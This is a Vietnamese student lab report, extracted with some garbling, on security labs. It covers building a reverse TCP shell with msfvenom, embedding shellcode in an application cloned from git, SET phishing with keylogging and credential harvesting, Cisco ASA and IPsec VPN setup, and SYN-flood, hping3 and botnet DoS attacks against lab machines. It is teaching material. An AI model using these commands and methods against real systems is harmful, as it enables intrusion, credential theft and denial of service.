Hình 39. Thực hiện kết nối từ máy người quản trịBước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat Bước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat Cài đặt
# wget -q -O - http://www.navicat.com/download_linux_repo?lnx_repo=ubuntu | sudo tee /etc/apt/sources.list.d/navicatmonitor.list
# sudo apt-get update
# sudo apt-get install navicatmonitor # sudo /etc/init.d/navicatmonitor start Truy cập 192.168.36.166:3000
Tiến hành cài đặt những thông tin cần thiết
Thực hiện xem database
LAB 3: THỰC HIỆN REVERSE TCP ĐỂ LẤY SHELL
1. Mục đích
Thực hiện lấy shell một máy chủ qua mạng bằng cách dùng reverse TCP và shellcode 2. Chuẩn bị và công cụ
Tên
Máy attack Máy victim Bước 1: Tiến hành lấy shell bằng câu lệnh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -- platform linux --arch x64
Thay đổi địa chỉ IP và PORT
Bước 2: Chép shell vào file shell.c
Hình 43. File shell.cBước 3: Biên dịch shell.c thành shell Bước 3: Biên dịch shell.c thành shell
Hình 44. Biên dịch shell.cBước 4: Thực thi shell Bước 4: Thực thi shell
Hình 45. Thực thi shell trên máy attackBước 5: Mở handler bằng netcat Bước 5: Mở handler bằng netcat
Hình 46. Mở handler trên máy attack
Hình 47. Lấy shellcode trên máy attackBước 7: Biên dịch getshell.c thành getshell Bước 7: Biên dịch getshell.c thành getshell
Hình 48. Biên dịch shellcode đã lấy ở trênBước 8: Mở handler bằng netcat Bước 8: Mở handler bằng netcat
Hình 49. Chép shellcode lên máy victimBước 10: Biên dịch và thực thi getshell Bước 10: Biên dịch và thực thi getshell
Hình 50. Biên dịch và thực thi shellcode trên máy victim
Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim
Hình 51. Kiểm tra kết nối và chép file lên máy victimBước 12: Quay lại máy victim và đã có file tcp_reverse.txt Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt
Hình 52. Kết quả file chép từ attack lên victim đã có
3. Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thiBước 1: Tìm source code từ git về Bước 1: Tìm source code từ git về
Hình 53. Source code một ứng dung trên gitBước 2: Chép tất cá shellcode vào file đã clone về từ git Bước 2: Chép tất cá shellcode vào file đã clone về từ git
Hình 54. Chép shellcode vào ứng dụng đã clone vềBước 3: Tiến hành thực thi trên máy victim Bước 3: Tiến hành thực thi trên máy victim
Hình 55. Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối
Hình 56. Mở handler trên máy attack và đã có kết nối
LAB 4 : THỰC HIỆN TẤN CÔNG SOCIAL ENGINEERING THƯỜNG DÙNG TRONG APT
Mơ hình
Tên
Máy attack Máy victim
1. Cài mã độc tấn cơng Social Engineering
Hình 57. Chọn Powershell Attack Vectors
Sau đó, tiếp tục chọn Powershell Alphanumeric Shellcode Injector. Nhập địa chỉ IP của máy attacker để tiến hành tạo Virus tấn cơng. Sau đó chọn yes
Bước 2: Copy file virus ra ngồi desktop đổi đi txt thanhg batBước 3: Trên máy victim tiến hành chạy fike virus Bước 3: Trên máy victim tiến hành chạy fike virus
Bước 4: Trên máy attacker tiến hành lấy thông tin từ máy victim bằng câu lệnh sessions -i
Hình 59. Lấy thơng tin từ máy nạn nhân Lệnh sysinfo và ipcofig
Hình 60. Lệnh sysinfo Lệnh keyscan_start để tiến hành lấy dữ liệu từ máy victim
Lệnh keyscan_dump để lấy dữ liệu từ máy victim Lệnh keyscan_stop để dừng lại
Lệnh screenshoot để chụp lại màn hình của máy victim 2. Demo tấn cơng bằng cách clone 1 link giả mạo
Bước 1:Khởi động setoolkit để dùng công cụ Social-Engineering AttacksChọn mục Website Attack Vectors Chọn mục Website Attack Vectors
Hình 61. Chọn Website Attack Vectors Bước 2: Chọn mục Credential Havrester Attack Method
Hình 62. Chọn Credential Havrester Attack Bước 3: Chọn mục site cloner
Bước 4: Nhập địa chỉ IP của máy attack
Hình 64. Nhập IP máy attacker
Hình 65. Thơng tin lấy được từ máy victim
Thông tin user và password lấy từ máy nạn nhân
Hình 66. Khi máy nạn nhân đăng nhập vào website giả mạo, máy attack có thể lấy được username và pasword
LAB 6 : CONFIG ASA BACSIC
Yêu cầu:
1. Kết nối và cấu hình địa chỉ IP thiết bị theo mơ hình
2. Cấu hình định tuyến trên FW và router R2 , đảm bảo người dùng trong vùng inside cóthể giao tiếp được với các server vùng DMZ thể giao tiếp được với các server vùng DMZ
3. Cấu hình FW chỉ cho phép PC với IP 192.168.2.10 được phép SSH vào FW
4. Cấu hình static NAT trên FW sao cho người dùng ngồi inetrnet chí có thể truy cập được dịch vụ Remote Desktop của server 192.168.10.10
5. Cấu hình PAT trên FW sao cho người dùng từ vùng inside có thể truy cập được các dịch vụ ngồi internet
Hình 67. Mơ hình ASA
1. Cấu hình thơng tin trên các cổng của FW Cổng inside
Hình 68. Thơng tin cấu hình trên cổng inside Cổng DMZ
Hình 69. Thơng tin cấu hình trên cổng DMZ Cổng outside
Hình 70. Thơng tin cấu hình trên cổng outside 2. Cấu hình định tuyến
Cấu hình default-route trên router R2 Cấu hình static route trên FW
Hình 71. Thơng tin cấu hình static route trên FW Mặc định ASA không cho phép icmp giữa các vùng, cần cấu hình thêm:
Hình 72. Thơng tin cấu hình icmp trên FW 3. Cấu hình SSH trên FW
Sau đó ta có thể truy cập SSH từ PC 192.168.2.10
Hình 74. Kết quả SSH vào FW trên ( PC 192.168.2.10)
4. Cấu hình static NAT và ACL để cho từ bên ngồi có thể truy cập dịch vụ RemoteDesktop trên vùng DMZ Desktop trên vùng DMZ
Bước 1: Cấu hình object network:
Hình 75. Thơng tin cấu hình object network Bước 2: Cấu hình object service:
Hình 76. Thơng tin cấu hình object service
Bước 3: Cấu hình NAT và cấu hình ACL để cho phép truy cập từ outside vào DMZ
Sau khi cấu hình, ta có thể truy cập dịch vụ remote desktop từ vùng outside ( cổng outside có địa chỉ: 192.168.36.151)
Hình 79 kết quả remote desktop vào PC 192.168.10.10
Hình 80. Kết quả truy cập dịch vụ remote desktop từ PC ngồi vùng outside 5. Cấu hình PAT để cho phép người dùng từ inside có thể truy cập internet
Hình 81. Thơng tin cấu hình PAT cho phép inside truy cập internet Sau khi cấu hình xong, ta có thể truy cập internet
Hình 82. Kết quả truy cập internet từ PC (192.168.2.10) (inside)
Hình 83. Kết quả ping từ PC ( 192.168.2.10 inside) đến PC (192.168.10.10 DMZ)
Hình 84. Mơ hình thực hiện cấu hình IPSEC VPN SITE TO SITE
1. Mơ tả
Thực hiện cấu hình IPSec VPN giữa hai site đảm bảo mạng LAN thuộc SAIGON và VUNGTAU có thể giao tiếp đươc với nhau
2. Cấu hình
2.1 Cấu hình trên router SAIGON
Bước 1: Cấu hình chính sách IKE (chính sách pha 1)
Hình 85. Thơng tin cấu hình chính sách IKE trên router SAIGON Bước 2: Xác định thơng tin key và peer
Hình 86. Thơng tin key và peer trên router SAIGON Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)
Hình 87. Thơng tin cấu hình chính sách IPSEC trên router SAIGON Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ
Hình 88. Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ trên souter SAIGON Bước 5: Cấu hình crypto map
Hình 89. Cấu hình crypto map trên router SAIGON 2.2 Cấu hình trên router VUNGTAU
Bước 1: Cấu hình chính sách IKE (chính sách pha 1)
Hình 90. Thơng tin cấu hình chính sách IKE trên router VUNGTAU
Hình 91. Thơng tin key và peer trên router VUNGTAU Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)
Hình 92. Thơng tin cấu hình chính sách IPSEC trên router VUNGTAU Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ
Hình 93. Xác định luồng dữu liệu được mã hóa hay bảo về trên router VUNGTAU Bước 5: Cấu hình crypto map
Hình 94. Thơng tin cấu hình crypto map trên router VUNGTAU 3. Kiểm tra
Kích hoạt kết nối VPN dựa vào lưu lượng xác định trên acl 100
Sauk hi kết nối VPN được thiết lập có thể kiểm tra thông tin về pha 1 và pha 2 Trạng thái isakmp sa:
Hình 96. Trạng thái crypto isakmp sa Trạng thái ipsec sa:
Số lượng kết nối được mở ( 1 IKE và 2 IPSEC)
Hình 98. Số lượng kết nối
LAB 8 TẤN CƠNG DDOS BẰNG SYNFLOOD VÀ HPING3
1. Tấn cơng ddos bằng synflood
SYN flood ( half-open attack) là một kiểu tấn công từ chối dịch vụ (DDos), tấn công này với mục đích làm cho Server khơng có lưu lượng để truy cập hợp pháp bằng cách tiêu thụ tất cả tài nguyên server đang có sẵn. Bằng việc gửi liên tục gửi các packet tin yêu cầu kết nối ban đầu (SYN).
Hình 100. Thơng tin máy nạn nhân Bước 1 : Kiểm tra port 445 của máy nạn nhân có mở khơng
Hình 101. Trên máy tấn công kiểm tra port 445 của máy nạn nhân
Bước 2 : Tiến hành giả lập máy ảo với địa chỉ 192.168.0.1 để tấn công máy nạn nhân với địa chỉ 192.168.36.142
Hình 103. Dùng msfconsole để show các options Mở wireshark để xem thơng tin các gói tin:
Đầu tiên, máy tấn công gửi 1 packet tin SYN đến Server để yêu cầu kết nối.
Sau khi tiếp nhận packet SYN, Server phản hồi lại máy khách bằng một packet SYN/ACK, để xác nhận thông tin từ Client.
Bước 3: Mở wireshark và theo dõi
Cuối cùng, Client nhận được packet tin SYN/ACK thì sẽ trả lời server bằng packet tin ACK báo với server biết rằng nó đã nhận được packet tin SYN/ACK, kết nối đã được thiết lập và sẵn sàng trao đổi dữ liệu.
Hình 104. Gói tin bắt được khi tấn cơng Mở task manager và quan sát biểu đồ hoạt động
Hình 105. Biểu đồ hoạt động của cpu trên máy nạn nhân
2. Tấn công với hping 3
Hping3 là một ứng dụng đầu cuối dành cho Linux điều đó sẽ cho phép chúng tơi dễ dàng phân tích và lắp ráp các gói TCP / IP. Không giống như một ping thông thường được sử dụng để gửi các gói ICMP, ứng dụng này cho phép gửi các gói TCP, UDP và RAW-IP.
Hping3 –S 192.168.36.133 –a 192.168.36.142 –p 335 –flood ( với 192.168.36.133 là ip máy tấn cơng, 192.168.36.142 là ip máy nạn nhân )
Hình 106. Tấn cơng với câu lệnh hping3 Mở task manager để xem thơng tin cpu của máy nạn nhân
Hình 107. Mở taskmanager trên máy nạn nhân và theo dõi bểu đồ Mở wireshark và theo dõi gói tin
Hình 108. Mở wireshark và theo dõi gói tin 3. Tấn cơng ddos bằng botnet:
Botnet là một mạng lưới các máy tính được cài phần mềm để làm 1 cơng việc nào đó. Người ta thường nói về botnet với nghĩa xấu hơn là tốt vì botnet hay được hacker mũ đen sử dụng để tấn cơng một website hay một dịch vụ online nào đó
Mơ hình gồm 2 máy : 1 máy attack , 1 máy victim Máy attack (linux với IP 192.168.36.155)
Hình 109. Thơng tin máy server Máy client (win 2012 với IP 192.168.36.162)
Hình 110. Thơng tin máy client Bước 1: Cấu hình file server.py trên máy server
Bước 2: Cấu hình file client.py trên máy clientTrên máy client ta có file client.py như sau Trên máy client ta có file client.py như sau
Bước 3 : Thực thi file server.py trên máy server
Hình 113. Thực thi file server.py để tạo botnet Bước 4: Thực thi file client.py trên máy client
Hình 114. Thực thi file client.py để kết nối đến máy server Bước 5: Kiểm tra đã có kết nối trên máy attack
Hình 115. Kiểm tra kết nối trên máy server bằng lệnh list Bước 6: Tấn công đến máy nạn nhân
Với ip 192.168.36.162 port 10 time 80s thread 100
Bước 7 : Mở taskmanager trên máy nạn nhân và theo dõi Ta thấy , cpu tăng đột ngột
Hình 117. Thơng tin cpu trên máy nạn nhân khi bị tấn công Khi tiến hành ngừng tấn cơng, cpu giảm nhanh dần
Hình 118. Thơng tin cpu trên máy nạn nhân khi ngừng tấn công Bước 8: Mở wireshark trên máy nạn nhân và theo dõi Ta